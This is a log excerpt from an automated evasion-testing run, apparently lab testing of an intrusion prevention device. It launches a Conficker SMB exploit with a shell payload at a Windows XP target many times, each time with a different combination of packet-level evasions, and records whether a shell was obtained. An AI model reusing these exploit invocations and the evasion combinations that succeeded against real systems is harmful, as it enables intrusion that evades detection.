  2654. 4583 runs averaging 1.91 runs / second ; progress: 2399/432002015-06-07 23:59:29 INFO
  2655. Success. (10.62.90.115):
  2656. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18737 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=o6dhAFDy5Zs --evasion=[smb_connect,end]smb_decoytrees,"5","6","2","random_msrpcreq" --evasion=[start,end]tcp_inittsopt,"enable","zero" --verifydelay=1000 --payload=shell
  2657. Info: Using random seed o6dhAFDy5Zu
  2658. - TCP timestamps enabled, initial TCP timestamp is set to normal ( ie. taken from the timestamp clock ).
  2659. The following evasions are applied from stage smb_connect to end:
  2660. - Before normal SMB writes, 5 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
  2661.  
  2662. Info: NetBIOS connection 10.62.90.115:18737 -> 10.35.1.207:445
  2663. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2664. Info: Sending MSRPC request with exploit
  2665. Info: Shell found, attack succeeded
  2666. Info: CommandShell::SendCommand() - Failed to send string
  2667. Info: Command shell connection reset.
  2668. Info: Shell closed
  2669. 0: Success.
  2670. ................
  2671. 4600 runs averaging 1.91 runs / second ; progress: 2404/43200.........
  2672. 4609 runs averaging 1.91 runs / second ; progress: 2409/43200.
  2673. 4610 runs averaging 1.91 runs / second ; progress: 2414/43200.2015-06-07 23:59:45 INFO
  2674. Success. (10.62.90.115):
  2675. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23455 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=FVDJtPsNgvo --evasion=[start,smb_openpipe]tcp_chaff,"1","chksum|nullflag|outofwindow|shorthdr","random_alpha" --evasion=[start,end]tcp_paws,"50%","6","alpharandomized" --verifydelay=1000 --payload=shell
  2676. Info: Using random seed FVDJtPsNgvo
  2677. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
  2678. The following evasions are applied from stage start to smb_openpipe:
  2679. - With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
  2680. * Invalid TCP checksum.
  2681. * NULL TCP control flags.
  2682. * An out-of-window sequence number.
  2683. * TCP header shorter than 20 bytes
  2684. * Duplicate packet has random alpha bytes as payload
  2685.  
  2686. Info: NetBIOS connection 10.62.90.115:23455 -> 10.35.1.207:445
  2687. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2688. Info: Sending MSRPC request with exploit
  2689. Info: Shell found, attack succeeded
  2690. Info: Shell closed
  2691. 0: Success.
  2692. ......
  2693. 4618 runs averaging 1.91 runs / second ; progress: 2419/43200......
  2694. 4624 runs averaging 1.91 runs / second ; progress: 2424/432002015-06-07 23:59:54 INFO
  2695. Success. (10.62.90.110):
  2696. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62608 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=jagl4e+Cocw --evasion=[netbios_connect,end]ipv4_frag,"48" --evasion=[start,msrpc_bind]ipv4_order,"rand" --evasion=[smb_openpipe,end]tcp_paws,"1","7","random_alpha" --verifydelay=1000 --payload=shell
  2697. Info: Using random seed jagl4e+Cocy
  2698. The following evasions are applied from stage start to msrpc_bind:
  2699. - IPv4 fragments are sent in a random order
  2700. The following evasions are applied from stage netbios_connect to end:
  2701. - IPv4 fragments with at most 48 bytes per fragment
  2702. The following evasions are applied from stage smb_openpipe to end:
  2703. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has random alpha bytes as payload
  2704.  
  2705. Info: NetBIOS connection 10.62.90.110:62608 -> 10.35.1.207:445
  2706. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2707. Info: Sending MSRPC request with exploit
  2708. Info: Shell found, attack succeeded
  2709. Info: Shell closed
  2710. 0: Success.
  2711. ..........
  2712. 4635 runs averaging 1.91 runs / second ; progress: 2429/43200..........
  2713. 4645 runs averaging 1.91 runs / second ; progress: 2434/43200.Pid 32240 timed out - killed
  2714. 2015-06-08 00:00:04 INFO
  2715. Timed out (10.62.90.118):
  2716. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47969 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=tp+FrT9yypg --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"1408" --evasion=[smb_connect,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
  2717. Info: Using random seed tp+FrT9yypi
  2718. The following evasions are applied from stage smb_connect to end:
  2719. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  2720. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  2721. - IPv4 fragments with at most 1408 bytes per fragment
  2722.  
  2723. Info: NetBIOS connection 10.62.90.118:47969 -> 10.35.1.207:445
  2724. Terminated
  2725. ................
  2726. 4663 runs averaging 1.91 runs / second ; progress: 2439/43200..........
  2727. 4673 runs averaging 1.91 runs / second ; progress: 2444/43200.........
  2728. 4682 runs averaging 1.91 runs / second ; progress: 2449/43200...........Pid 32520 timed out - killed
  2729. 2015-06-08 00:00:24 INFO
  2730. Timed out (10.62.90.114):
  2731. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40937 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=2UySA8bJYfo --evasion=[netbios_connect,smb_openpipe]tcp_chaff,"75%","nullchksum|nullflag|shorthdr|longhdr","alphanumrandomized" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  2732. Info: Using random seed 2UySA8bJYfr
  2733. The following evasions are applied from stage netbios_connect to smb_openpipe:
  2734. - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  2735. * NULL TCP checksum.
  2736. * NULL TCP control flags.
  2737. * TCP header shorter than 20 bytes
  2738. * TCP header longer than packet total size
  2739. * Duplicate packet has original payload with alphanumeric bytes randomized
  2740. The following evasions are applied from stage smb_opentree to end:
  2741. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  2742.  
  2743. Info: NetBIOS connection 10.62.90.114:40937 -> 10.35.1.207:445
  2744. Terminated
  2745.  
  2746. 4694 runs averaging 1.91 runs / second ; progress: 2454/43200........................
  2747. 4718 runs averaging 1.92 runs / second ; progress: 2459/43200......2015-06-08 00:00:31 INFO
  2748. Success. (10.62.90.113):
  2749. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33922 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=ftL7lBQo1h0 --evasion=[smb_connect,smb_opentree]smb_decoytrees,"2","4","652","random" --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"4","3","2047","random" --evasion=[start,end]tcp_paws,"75%","268435453","random_alphanum" --verifydelay=1000 --payload=shell
  2750. Info: Using random seed ftL7lBQo1h1
  2751. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random alphanumeric bytes as payload
  2752. The following evasions are applied from stage smb_connect to smb_opentree:
  2753. - Before normal SMB writes, 2 SMB trees are opened and 4 writes are performed to them. The write payload is 652 random bytes.
  2754. The following evasions are applied from stage smb_opentree to msrpc_bind:
  2755. - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 2047 random bytes.
  2756.  
  2757. Info: NetBIOS connection 10.62.90.113:33922 -> 10.35.1.207:445
  2758. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2759. Info: Sending MSRPC request with exploit
  2760. Info: Shell found, attack succeeded
  2761. Info: Shell closed
  2762. 0: Success.
  2763. ...........
  2764. 4736 runs averaging 1.92 runs / second ; progress: 2464/43200........2015-06-08 00:00:37 INFO
  2765. Success. (10.62.90.110):
  2766. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15508 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=UyQ9/Q7tcpQ --evasion=[smb_opentree,msrpc_req]ipv4_opt,"2","inc","unmodified" --evasion=[msrpc_bind,msrpc_req]smb_writeandxpad,"219","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","72760242","alpharandomized" --verifydelay=1000 --payload=shell
  2767. Info: Using random seed UyQ9/Q7tcpR
  2768. The following evasions are applied from stage smb_connect to msrpc_req:
  2769. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 72760242> and has original payload with alphabetic bytes randomized
  2770. The following evasions are applied from stage smb_opentree to msrpc_req:
  2771. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  2772. The duplicate packet has identical payload
  2773. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2774. - 219 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  2775.  
  2776. Info: NetBIOS connection 10.62.90.110:15508 -> 10.35.1.207:445
  2777. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2778. Info: Sending MSRPC request with exploit
  2779. Info: Shell found, attack succeeded
  2780. Info: Shell closed
  2781. 0: Success.
  2782. ...
  2783. 4748 runs averaging 1.92 runs / second ; progress: 2469/43200...........
  2784. 4759 runs averaging 1.92 runs / second ; progress: 2474/432002015-06-08 00:00:45 INFO
  2785. Success. (10.62.90.115):
  2786. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19812 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=APidMQF+mvg --evasion=[msrpc_bind,msrpc_req]smb_chaff,"50%","write_flag","rand" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","159953442","shuffle" --verifydelay=1000 --payload=shell
  2787. Info: Using random seed APidMQF+mvg
  2788. The following evasions are applied from stage netbios_connect to msrpc_req:
  2789. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 159953442> and has shuffled original payload
  2790. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2791. - 50% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
  2792.  
  2793. Info: NetBIOS connection 10.62.90.115:19812 -> 10.35.1.207:445
  2794. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2795. Info: Sending MSRPC request with exploit
  2796. Info: Shell found, attack succeeded
  2797. Info: Shell closed
  2798. 0: Success.
  2799. .Pid 487 timed out - killed
  2800. 2015-06-08 00:00:47 INFO
  2801. Timed out (10.62.90.112):
  2802. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49214 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=YuEkRjb1/QI --evasion=[msrpc_req,end]smb_fnameobf,"add_null_trailer" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  2803. Info: Using random seed YuEkRjb1/QJ
  2804. The following evasions are applied from stage smb_opentree to msrpc_req:
  2805. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  2806. The following evasions are applied from stage msrpc_req to end:
  2807. - The SMB filename is obfuscated:
  2808. * A 0x00 and random alphanumeric characters are appended to the filename
  2809.  
  2810. Info: NetBIOS connection 10.62.90.112:49214 -> 10.35.1.207:445
  2811. Terminated
  2812. ......
  2813. 4768 runs averaging 1.92 runs / second ; progress: 2479/43200......................
  2814. 4790 runs averaging 1.93 runs / second ; progress: 2484/43200.......2015-06-08 00:00:57 INFO
  2815. Success. (10.62.90.119):
  2816. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33279 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=/95Xlpf3RsE --evasion=[smb_connect,msrpc_req]tcp_paws,"1","221380699","alphanumrandomized" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"3","225560803","alphanumrandomized" --verifydelay=1000 --payload=shell
  2817. Info: Using random seed /95Xlpf3RsH
  2818. The following evasions are applied from stage smb_connect to msrpc_req:
  2819. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 221380699> and has original payload with alphanumeric bytes randomized
  2820. The following evasions are applied from stage smb_opentree to smb_openpipe:
  2821. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 225560803> and has original payload with alphanumeric bytes randomized
  2822.  
  2823. Info: NetBIOS connection 10.62.90.119:33279 -> 10.35.1.207:445
  2824. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2825. Info: Sending MSRPC request with exploit
  2826. Info: Shell found, attack succeeded
  2827. Info: Shell closed
  2828. 0: Success.
  2829. ......
  2830. 4804 runs averaging 1.93 runs / second ; progress: 2489/43200..2015-06-08 00:01:00 INFO
  2831. Success. (10.62.90.119):
  2832. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31556 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=6iwHnnxwOcY --evasion=[smb_openpipe,end]netbios_chaff,"75%","empty_unspec|empty_keepalive|http_get|broken_length" --evasion=[msrpc_req,end]tcp_paws,"1","268435454","random_alpha" --verifydelay=1000 --payload=shell
  2833. Info: Using random seed 6iwHnnxwOcb
  2834. The following evasions are applied from stage smb_openpipe to end:
  2835. - 75% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  2836. The following evasions are applied from stage msrpc_req to end:
  2837. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
  2838.  
  2839. Info: NetBIOS connection 10.62.90.119:31556 -> 10.35.1.207:445
  2840. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2841. Info: Sending MSRPC request with exploit
  2842. Info: Shell found, attack succeeded
  2843. Info: Shell closed
  2844. 0: Success.
  2845. ......
  2846. 4813 runs averaging 1.93 runs / second ; progress: 2494/43200.........
  2847. 4822 runs averaging 1.93 runs / second ; progress: 2499/43200........
  2848. 4830 runs averaging 1.93 runs / second ; progress: 2505/43200..................
  2849. 4848 runs averaging 1.93 runs / second ; progress: 2510/43200.........2015-06-08 00:01:22 INFO
  2850. Success. (10.62.90.112):
  2851. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55302 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=NCio3MEwTEg --evasion=[smb_connect,msrpc_req]netbios_chaff,"21","empty_unspec|http_get|http_post|msrpc_req|broken_length" --evasion=[msrpc_req,end]tcp_paws,"75%","268435453","random" --verifydelay=1000 --payload=shell
  2852. Info: Using random seed NCio3MEwTEg
  2853. The following evasions are applied from stage smb_connect to msrpc_req:
  2854. - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  2855. The following evasions are applied from stage msrpc_req to end:
  2856. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
  2857.  
  2858. Info: NetBIOS connection 10.62.90.112:55302 -> 10.35.1.207:445
  2859. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2860. Info: Sending MSRPC request with exploit
  2861. Info: Shell found, attack succeeded
  2862. Info: CommandShell::SendCommand() - Failed to send string
  2863. Info: Command shell connection reset.
  2864. Info: Shell closed
  2865. 0: Success.
  2866. ......2015-06-08 00:01:24 INFO
  2867. Success. (10.62.90.113):
  2868. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26322 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=QWx1nZIe9+M --evasion=[smb_connect,end]tcp_paws,"75%","72312509","alpharandomized" --evasion=[smb_connect,msrpc_req]tcp_segvar,"8","65535" --verifydelay=1000 --payload=shell
  2869. Info: Using random seed QWx1nZIe9+N
  2870. The following evasions are applied from stage smb_connect to end:
  2871. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 72312509> and has original payload with alphabetic bytes randomized
  2872. The following evasions are applied from stage smb_connect to msrpc_req:
  2873. - TCP packets are segmented to contain between 8 and 65535 bytes of payload.
  2874.  
  2875. Info: NetBIOS connection 10.62.90.113:26322 -> 10.35.1.207:445
  2876. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2877. Info: Sending MSRPC request with exploit
  2878. Info: Shell found, attack succeeded
  2879. Info: Shell closed
  2880. 0: Success.
  2881. ...
  2882. 4868 runs averaging 1.94 runs / second ; progress: 2515/43200........................................
  2883. 4908 runs averaging 1.95 runs / second ; progress: 2520/43200.....
  2884. 4913 runs averaging 1.95 runs / second ; progress: 2525/43200...
  2885. 4916 runs averaging 1.94 runs / second ; progress: 2530/43200Pid 1602 timed out - killed
  2886. 2015-06-08 00:01:40 INFO
  2887. Timed out (10.62.90.111):
  2888. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34158 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=Od53aWgCGO8 --evasion=[smb_openpipe,end]smb_decoytrees,"4","1","3","random_alphanum" --evasion=[smb_connect,end]tcp_urgent,"8","random_alpha" --verifydelay=1000 --payload=shell
  2889. Info: Using random seed Od53aWgCGO8
  2890. The following evasions are applied from stage smb_connect to end:
  2891. - Add a random alphaurgent data byte to every 8 TCP segment.
  2892. The following evasions are applied from stage smb_openpipe to end:
  2893. - Before normal SMB writes, 4 SMB trees are opened and 1 writes are performed to them. The write payload is 3 random alphanumeric bytes.
  2894.  
  2895. Info: NetBIOS connection 10.62.90.111:34158 -> 10.35.1.207:445
  2896. Terminated
  2897. ......
  2898. 4923 runs averaging 1.94 runs / second ; progress: 2535/43200................
  2899. 4939 runs averaging 1.94 runs / second ; progress: 2540/43200..................
  2900. 4957 runs averaging 1.95 runs / second ; progress: 2545/43200..........2015-06-08 00:01:57 INFO
  2901. Success. (10.62.90.115):
  2902. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56910 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=h1E0rUeQUeg --evasion=[msrpc_bind,end]smb_fnameobf,"change_case|add_paths" --evasion=[start,end]tcp_paws,"75%","6","random_alpha" --evasion=[netbios_connect,msrpc_req]tcp_paws,"21","268435455","shuffle" --verifydelay=1000 --payload=shell
  2903. Info: Using random seed h1E0rUeQUei
  2904. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has random alpha bytes as payload
  2905. The following evasions are applied from stage netbios_connect to msrpc_req:
  2906. - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
  2907. The following evasions are applied from stage msrpc_bind to end:
  2908. - The SMB filename is obfuscated:
  2909. * Random characters case is changed
  2910. * Dummy paths are added ( a/b -> a/c/../b )
  2911.  
  2912. Info: NetBIOS connection 10.62.90.115:56910 -> 10.35.1.207:445
  2913. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2914. Info: Sending MSRPC request with exploit
  2915. Info: Shell found, attack succeeded
  2916. Info: Shell closed
  2917. 0: Success.
  2918. ...........
  2919. 4979 runs averaging 1.95 runs / second ; progress: 2550/43200.................
  2920. 4996 runs averaging 1.96 runs / second ; progress: 2555/43200.........
  2921. 5005 runs averaging 1.96 runs / second ; progress: 2560/43200...............
  2922. 5020 runs averaging 1.96 runs / second ; progress: 2565/43200.......Pid 2406 timed out - killed
  2923. 2015-06-08 00:02:17 INFO
  2924. Timed out (10.62.90.117):
  2925. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40290 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=AhYHSBXWoXo --evasion=[start,msrpc_bind]tcp_paws,"8","54291791","shuffle30" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  2926. Info: Using random seed AhYHSBXWoXo
  2927. The following evasions are applied from stage start to msrpc_bind:
  2928. - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 54291791> and has 30 bytes of original payload, then shuffled original payload
  2929. The following evasions are applied from stage smb_opentree to msrpc_bind:
  2930. - Add a random urgent data byte to every 2 TCP segment.
  2931.  
  2932. Info: NetBIOS connection 10.62.90.117:40290 -> 10.35.1.207:445
  2933. Terminated
  2934. .........
  2935. 5037 runs averaging 1.96 runs / second ; progress: 2570/43200........
  2936. 5045 runs averaging 1.96 runs / second ; progress: 2575/43200......
  2937. 5051 runs averaging 1.96 runs / second ; progress: 2580/43200...............
  2938. 5066 runs averaging 1.96 runs / second ; progress: 2585/43200.............
  2939. 5079 runs averaging 1.96 runs / second ; progress: 2590/43200.....
  2940. 5084 runs averaging 1.96 runs / second ; progress: 2595/43200.....
  2941. 5089 runs averaging 1.96 runs / second ; progress: 2600/43200...............
  2942. 5104 runs averaging 1.96 runs / second ; progress: 2605/43200...........
  2943. 5115 runs averaging 1.96 runs / second ; progress: 2610/43200.............2015-06-08 00:03:05 INFO
  2944. Success. (10.62.90.115):
  2945. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59465 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=3DS3pyOHWq0 --evasion=[start,msrpc_bind]tcp_chaff,"21","chksum|shorthdr","shuffle" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","268435455","alpharandomized" --verifydelay=1000 --payload=shell
  2946. Info: Using random seed 3DS3pyOHWq3
  2947. The following evasions are applied from stage start to msrpc_bind:
  2948. - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
  2949. * Invalid TCP checksum.
  2950. * TCP header shorter than 20 bytes
  2951. * Duplicate packet has shuffled original payload
  2952. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2953. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphabetic bytes randomized
  2954.  
  2955. Info: NetBIOS connection 10.62.90.115:59465 -> 10.35.1.207:445
  2956. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2957. Info: Sending MSRPC request with exploit
  2958. Info: Shell found, attack succeeded
  2959. Info: Shell closed
  2960. 0: Success.
  2961.  
  2962. 5129 runs averaging 1.96 runs / second ; progress: 2615/43200.......
  2963. 5136 runs averaging 1.96 runs / second ; progress: 2620/43200...
  2964. 5139 runs averaging 1.96 runs / second ; progress: 2625/43200
  2965. 5139 runs averaging 1.95 runs / second ; progress: 2630/43200....
  2966. 5143 runs averaging 1.95 runs / second ; progress: 2635/43200......
  2967. 5149 runs averaging 1.95 runs / second ; progress: 2640/43200....
  2968. 5153 runs averaging 1.95 runs / second ; progress: 2645/43200.......
  2969. 5160 runs averaging 1.95 runs / second ; progress: 2650/43200......
  2970. 5166 runs averaging 1.95 runs / second ; progress: 2655/43200.....
  2971. 5171 runs averaging 1.94 runs / second ; progress: 2660/43200...2015-06-08 00:03:53 INFO
  2972. Success. (10.62.90.117):
  2973. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=27679 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=QkY39pBKwKw --evasion=[netbios_connect,end]tcp_paws,"1","121655769","random" --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"43643","65533" --verifydelay=1000 --payload=shell
  2974. Info: Using random seed QkY39pBKwKx
  2975. The following evasions are applied from stage netbios_connect to end:
  2976. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 121655769> and has random bytes as payload
  2977. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2978. - TCP packets are segmented to contain between 43643 and 65533 bytes of payload.
  2979.  
  2980. Info: NetBIOS connection 10.62.90.117:27679 -> 10.35.1.207:445
  2981. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2982. Info: Sending MSRPC request with exploit
  2983. Info: Shell found, attack succeeded
  2984. Info: Shell closed
  2985. 0: Success.
  2986. .........
  2987. 5184 runs averaging 1.94 runs / second ; progress: 2665/43200......
  2988. 5190 runs averaging 1.94 runs / second ; progress: 2670/43200.......
  2989. 5197 runs averaging 1.94 runs / second ; progress: 2675/43200..........
  2990. 5207 runs averaging 1.94 runs / second ; progress: 2680/43200.......
  2991. 5214 runs averaging 1.94 runs / second ; progress: 2686/43200...........
  2992. 5225 runs averaging 1.94 runs / second ; progress: 2691/43200.........
  2993. 5234 runs averaging 1.94 runs / second ; progress: 2696/43200..........2015-06-08 00:04:30 INFO
  2994. Success. (10.62.90.111):
  2995. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38914 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=lPX1ueb1MCY --evasion=[msrpc_bind,end]tcp_paws,"75%","8","shuffle" --evasion=[smb_connect,msrpc_bind]tcp_segvar,"65533","65534" --verifydelay=1000 --payload=shell
  2996. Info: Using random seed lPX1ueb1MCa
  2997. The following evasions are applied from stage smb_connect to msrpc_bind:
  2998. - TCP packets are segmented to contain between 65533 and 65534 bytes of payload.
  2999. The following evasions are applied from stage msrpc_bind to end:
  3000. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has shuffled original payload
  3001.  
  3002. Info: NetBIOS connection 10.62.90.111:38914 -> 10.35.1.207:445
  3003. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3004. Info: Sending MSRPC request with exploit
  3005. Info: Shell found, attack succeeded
  3006. Info: Shell closed
  3007. 0: Success.
  3008.  
  3009. 5245 runs averaging 1.94 runs / second ; progress: 2701/43200.........Pid 4779 timed out - killed
  3010. 2015-06-08 00:04:34 INFO
  3011. Timed out (10.62.90.116):
  3012. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31057 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=66asV1b53WY --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"5","inc","zero" --evasion=[smb_connect,smb_openpipe]ipv4_opt,"2","inc","unmodified" --evasion=[netbios_connect,end]tcp_paws,"2","3","zero" --verifydelay=1000 --payload=shell
  3013. Info: Using random seed 66asV1b53Wb
  3014. The following evasions are applied from stage netbios_connect to msrpc_bind:
  3015. - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  3016. The duplicate packet has NULL bytes for payload
  3017. The following evasions are applied from stage netbios_connect to end:
  3018. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has 0x00 bytes as payload
  3019. The following evasions are applied from stage smb_connect to smb_openpipe:
  3020. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  3021. The duplicate packet has identical payload
  3022.  
  3023. Info: NetBIOS connection 10.62.90.116:31057 -> 10.35.1.207:445
  3024. Terminated
